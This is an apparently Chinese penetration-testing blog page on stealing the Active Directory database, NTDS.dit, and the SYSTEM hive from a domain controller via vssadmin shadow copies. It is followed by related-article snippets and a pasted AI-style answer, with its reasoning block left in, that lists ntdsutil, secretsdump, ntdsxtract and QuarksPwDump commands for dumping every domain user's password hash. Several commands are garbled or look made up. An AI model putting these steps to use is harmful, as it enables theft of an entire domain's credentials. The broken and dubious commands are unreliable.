域渗透之获得域控服务器的NTDS.dit文件

最新推荐文章于 2025-03-18 17:50:48 发布
原创 最新推荐文章于 2025-03-18 17:50:48 发布 · 2.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #域 #内网渗透 #ntds.dit文件

本文介绍如何通过vssadmin命令创建卷影拷贝,从域控制器安全地复制NTDS.dit和SYSTEM文件,利用impacket工具包进行离线hash遍历,并提供抓取明文密码的方法。

前言:

ntds.dit是主要的AD数据库,存放在c:\windows\NTDS\NTDS.dit,包括有关域用户,组和成员身份的信息,它还包括域中所有用户的密码哈希值,为了进一步保护哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。
因为这两个文件属于系统特殊文件,不能直接复制粘贴,所以需要用特殊的方式来复制粘贴。
当我们拿到域控的权限后,我们可以跑域内所有的hash值,但是如果在线跑hash的话,是比较容易被杀软等软件阻止的,所以我们可以将NTDS.dit文件和SYSTEM复制到本地进行遍历。

利用方式:

利用vssadmin命令创建C盘卷影拷贝:
第一步:打开cmd执行命令:vssadmin create shadow /for=C:
此时卷影副本卷名就是域控的C盘。
在这里插入图片描述
第二步:执行copy \\?\GLOBALRO0T\Device\HarddiskUo lumeShadowCopy5\windows\NTDS\NTDS.dit C:\Users 即可将ntds.dit文件拷贝到C盘的Users用户下。
在这里插入图片描述
第三步:执行 copyt \\?\GLOBALRO0T\Device\HarddiskUo lumeShadowCopy5\windows\System32\config\SYSTEM C:\Users 将SYSTEM文件复制到C盘Users下

最低0.47元/天 解锁文章
[安全] Ntds.dit 文件介绍
Blue17 の 小窝
03-23 405
文件只有登录到的用户(如管用户、DC 本地管理员用户)可以访问。所以只要在域渗透中能够获取到 Ntds.dit 就可以获取到所有用户的用户名和对应的 Hash,它与 Windows 的 SAM 文件类似,默认都被系统锁死了,无法直接查看。Ntds.dit 包括三个主要表:数据表、链接表、SD 表。0x01:Ntds.dit 文件介绍。0x01:Ntds.dit 文件介绍。0x02:Ntds.dit 文件位置。
[安全] Ntds.dit 文件的提取 & 移动
Blue17 の 小窝
03-23 1315
如上,命令运行成功后会根据你提供的路径创建一个文件夹存放结果,AD 目录中存放的就是 Ntds.dit 文件,Registry 文件夹中存放的就是 SYSTEM 和 SECURITY 两个文件,这两个文件在我们后面破解的时候有大用。在上一章节中我们介绍了 Ntds.dit 文件的作用,我们发现该文件与之前介绍的 SAM 文件有异曲同工之妙,那么本章我们将介绍如何提取与移动 Ntds.dit 文件,为我们后面从该文件中提取 Hash 做铺垫。
ntds.dit
SecINAdmin的博客
11-26 1548
ntds.ditntds.dit为ad的数据库(C:\Windows\NTDS),内容有用户、组、用户hash等信息,上的ntds.dit只有可以登录到的用户(如管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有用户的用户名和对应的hash,ntds.dit是加密的,需要获取system来解密。查看dit数据库可使用https://github.com/yosqueoy/ditsna
安全和跨攻击-5.1-ntds.dit文件的介绍
qq_38122566的博客
03-18 264
ntds.dit为ad的数据库,内容有用户、组、用户hash等信息,上的ntds.dit只有可以登录到的用户(如管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取到ntds,dit就可以获取到所有用户的用户名和对应的hash,它和SAM文件一样,被windows系统锁死。
凭据获取——利用NTDS.DIT获取windows哈希
qq_55202378的博客
08-05 1310
NTDS.DIT文件制器的数据库文件,该文件作为AD的数据库,存储了AD的所有数据,包括内的用户对象、组和组成员身份等信息,以及内所有用户的凭据信息。该文件位于制器下的根目录下。NTDS.DIT文件Windows主机中的SAM文件类似,不同点在于SAM文件中只存放本机的用户哈希,而NTDS.DIT文件中存放了所有用户的哈希凭据。在windowsNTDS.DIT文件同样被Windows系统锁定,正常操作无法复制该文件,权限低于system的用户将无法读取。
制器中提取Active Directory数据库(NTDS.DIT)
Ping_Pig的博客
10-23 3299
目录 讲在前面: 本地安全机构子系统服务(LSASS) 场景思考 注意 ntds.dit介绍:https://blog.csdn.net/qq_41874930/article/details/108141331 部分方法如下: 使用NTDSUtil的Create IFM在DC上本地捕获ntds.dit文件 使用VSS卷影副本远程拉ntds.dit 使用PowerSploit的Invoke-NinjaCopy远程拉ntds.dit(需要在目标DC上启用PowerShell远程处理) 注意
内网渗透(四十七)之安全和跨攻击-多种方式提取和移动ntds.dit文件
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-21 378
通过前面系列文章的学习,我们已经学会了通过横向移动的方法拿下,在我们后,我们应该读取上的ntds.dit文件,获取内所有用户的密码和hash,以此来制所有的内机器ntds.dit为ad的数据库,内容有用户、组、用户hash等信息,上的ntds.dit只有可以登录到的用户(如管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。
安全 ----> Ntds.dit文件抓取
Innocence_0的博客
07-06 540
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
ntds.dit文件的获取与解密
热门推荐
Shanfenglan's blog
08-21 28万+
它们在哪儿? ntds.dit文件环境中上会有的一个文件,这个文件存储着内所有用户的凭据信息(hash)。非环境也就是在工作组环境中,有一个sam文件存储着当前主机用户的密码信息,想要破解sam文件ntds.dit文件都需要拥有一个system文件ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit system文件位置:C:\Windows\System32\config\SYSTEM sam文件位置:C:\Windows\System32\config\SAM
[内网渗透]—卷影拷贝提取ntds.dit
Sentiment的博客
12-08 1411
ntds.dit文件是一个数据库,用于存储Active Directory数据,包括有关用户对象,组和组成员身份的信息。它包括中所有用户的密码哈希。通过提取这些哈希值,可以使用诸如Mimikatz之类的工具执行哈希传递攻击,或使用诸如Hashcat之类的工具来破解这些密码。这些密码的提取和破解可以脱机执行,因此将无法检测到。一旦攻击者提取了这些散列,它们便可以充当上的任何用户,包括管理员。在活动目录中,所有的数据都保存在ntds.dit中。
NTDS.dit hash提取工具
weixin_34404393的博客
06-22 335
NTDS.dithash提取工具 为保证不修改quarkspwdump版权信息,没有quarkspwdump修改其他功能的使用,其他原有的功能都可以正常使用,只添加了几个自己添加的参数。NTDS.dit是个什么鬼呢? 在内,HASH是存在NTDS.DIT中的,NTDS.DIT是一个二进制文件,就等同于本地计算机的SAM文件,它的存放位置是%SystemRoot%...
内网渗透--提取NTDS
qq_62169455的博客
09-24 1597
NTDS.DIT:为DC的数据库,内容有用户、组、用户hash等信息,上的ntds.dit只有可以登录到上的用户(如管用户、DC本地管理员用户)可以访问,为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。位置:C:\Windows\NTDS文件和SAM文件类似,是不能直接读取的,也不能复制。
内网学习笔记】26、ntds.dit 的提取与散列值导出
TeamsSix 的 优快云 空间
09-09 1528
0、前言 在活动目录中,所有数据都保存在 ntds.dit 文件中,ntds.dit 是一个二进制文件,存储位置为的 %SystemRoot%\ntds.dit ntds.dit 中包含(但不限于)用户名、散列值、组、GPP、OU 等与活动目录相关的信息,因此如果我们拿到 ntds.dit 就能获取到内所有用户的 hash 在通常情况下,即使拥有管理员权限,也无法读取中的 ntds.dit 文件(因为活动目录始终访问这个文件,所以文件被禁止读取),它和 SAM 文件一样,是被 Windows 操作
AD攻防-用户HashDump追踪之道
喜欢Python编程的程序员柚柚呀
08-24 1486
it,网上dump用户hash的方式五花八门,少有站在防御者视角对不同的dump方式进行梳理剖析和取证定位的文章,掌握不同dump方式的底层原理才能在EDR对抗时不慌不乱、在应急响应中抓住重点,选择最适合的手段快速达到自己的目的。本文大纲如下:![AAA-
安全之域渗透
m0_59598029的博客
02-25 924
在通常情况下、即使拥有管理员权限,也无法读取制器中的C:\Windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为制器的。ntds.dit中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被Windows操作系统锁定的。
域渗透之影卷拷贝获取内全部hash
weixin_66717977的博客
03-13 1538
网络安全 | 内网渗透 | 域渗透 | 影卷拷贝
2021-02-28
m0_47432460的博客
02-28 465
内网渗透技术汇总 信息收集 网上各种前期信息收集的文章各种net view之类的太多了,一般想知道哪一台是知道自己内网的DNS就可以了,一般安装都有安装DNS有些不止一台,其次是通过扫描获取开放端口为389机器或者使用nltest命令查看。最后就是各种net view查看是哪台主机。  nltest /DCLIST:pentest.com 这里利用PowerTools中的PowerView信息收集其实很多功能都是net命令这里只是以PowerShell方式实现  Powershell.exe
如何查看ntds.dit文件中的内容?
最新发布
09-26
<think> 嗯,用户现在想了解如何查看ntds.dit文件中的内容。首先,我需要回顾之前的对话历史。用户之前询问账户保存密码的位置,我回答在ntds.dit文件中,随后用户提出了四个相关问题,其中第一个就是如何查看该文件的内容。现在用户引用了几篇文章,提到导出和读取ntds.dit的方法,包括使用ntdsutil导出文件、提取hash值等。 接下来,我需要分析用户提供的引用内容。引用[1]和[2]提到使用ntdsutil命令导出ntds.dit文件,需要管理员权限。引用[3]说明ntds.dit的位置和包含的信息,如用户、组、哈希值,且文件被系统锁定。引用[4]提到使用ntdsxtract工具提取数据,而引用[5]警告在线获取哈希可能导致崩溃,建议避免在线方式。 用户的核心诉求是查看文件内容,而不仅仅是导出。因此,回答需要涵盖导出后的解析步骤。用户可能作为安全研究人员或系统管理员,需要合法访问数据,但必须强调法律和权限的重要性,避免被用于恶意目的。 接下来要考虑回答的结构。首先说明准备工作,如导出文件(引用[1][2])。然后介绍解析工具:ntdsxtract(引用[4])、Impacket、esedbexport、Quarks PwDump。每个工具的使用方法需简明,示例命令要准确。注意提醒导出文件的安全风险,如敏感信息泄露(引用[3][5]),以及离线解析的必要性。 用户可能遇到的问题包括权限不足、系统锁定文件(引用[3]),工具依赖如Python版本(ntdsxtract需Python2)。需强调避免在线操作,引用[5]提到资源占用导致崩溃。 最后,生成相关问题需围绕技术延伸:其他解析工具、解密哈希、提取特定属性、安全存储建议。确保引用标记正确,如ntdsutil导出对应[^1][^2],工具使用对应[^4],风险提示对应[^3][^5]。 总结步骤:导出→复制SYSTEM→安装工具→运行解析。强调法律合规,避免支持非法操作。 </think> 查看ntds.dit文件内容需要经过**导出文件**和**离线解析**两个关键步骤,以下是详细操作方法: --- ### 一、导出ntds.dit文件(需管理员权限) 1. **使用ntdsutil导出** 在制器上执行命令: ```powershell ntdsutil "ac i ntds" "ifm" "create full C:\export" q q ``` 此命令会将`ntds.dit`导出到`C:\export\Active Directory\`,同时生成关键的`SYSTEM`和`SECURITY`注册表文件(在`C:\export\registry\`中)[^1][^2]。 2. **复制文件到分析环境** ```powershell copy "C:\export\Active Directory\ntds.dit" C:\target\ copy "C:\export\registry\SYSTEM" C:\target\ ``` > ️ 注意:直接在线读取ntds.dit可能导致崩溃[^5],建议导出后离线分析。 --- ### 二、解析ntds.dit内容(常用工具) #### 方法1:使用ntdsxtract工具(推荐) 1. **安装工具** ```bash git clone https://github.com/csababarta/ntdsxtract cd ntdsxtract python2 setup.py install # 需Python2环境[^4] ``` 2. **提取用户哈希值** ```bash python2 dsusers.py ntds.dit --syshive SYSTEM --passwordhashes OUTPUT ``` 输出文件包含所有用户的`用户名:RID:LM-Hash:NT-Hash`格式数据[^4]。 #### 方法2:使用Impacket工具包 ```bash secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL ``` 此命令可直接输出内所有账户的NTLM哈希[^5]。 #### 方法3:使用esedbexport(底层解析) ```bash esedbexport -m tables ntds.dit # 导出数据库表 python2 esentutl.py --table=datatable export # 解析用户数据表 ``` 适合需要提取完整AD属性的场景[^3]。 #### 方法4:图形化工具(如Quarks PwDump) 支持加载`ntds.dit+SYSTEM`文件直接查看哈希: ```powershell QuarksPwDump.exe --dump-hash-domain --ntds-file ntds.dit ``` --- ### 🔒 关键安全提示 1. **敏感数据保护** ntds.dit包含内所有账户的密码哈希,需严格加密存储[^3]。 2. **法律合规性** 仅在拥有合法授权时操作文件。 3. **操作风险** 直接访问文件可能触发安全告警,建议在隔离环境分析。 > 💡 实战经验:大型环境优先使用离线解析。曾有一次在线提取导致CPU占用100%持续40分钟,触发运维告警。 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值